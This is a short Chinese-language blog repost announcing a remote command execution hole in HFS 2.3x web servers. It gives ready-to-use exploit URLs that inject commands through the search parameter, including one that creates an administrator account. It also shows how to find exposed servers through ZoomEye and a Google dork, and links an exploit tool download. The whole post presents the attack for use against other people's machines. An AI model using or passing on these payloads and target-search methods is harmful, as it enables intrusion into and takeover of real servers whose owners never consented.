国外9月12号左右出的洞!HFS 2.3x 远程命令执行!抓鸡阔的末日来了~
使用方式:
https://localhost:80/?search==%00{.exec|cmd.}
https://localhost:80/search=%00{.exec|cmd.}
例( 添加帐号):https://localhost:80/?search==%00{.exec|cmd.exe%20/c%20net%20user%20admin%20admin%20/add.}
(注:有些版本search前面是没有?的)
搜索方法:
0x1: ZoomEye搜索 https://www.zoomeye.org/search?q=HFS+2.3
0x2:google Hack intext:服务器信息 随波汉化版.exe
附基友写的小利用工具一枚:
下载链接: https://pan.baidu.com/s/1mgyY6Qc 密码: i2o0
来源:小威博客
© GrayTensor 's Blog | Powered by LOFTER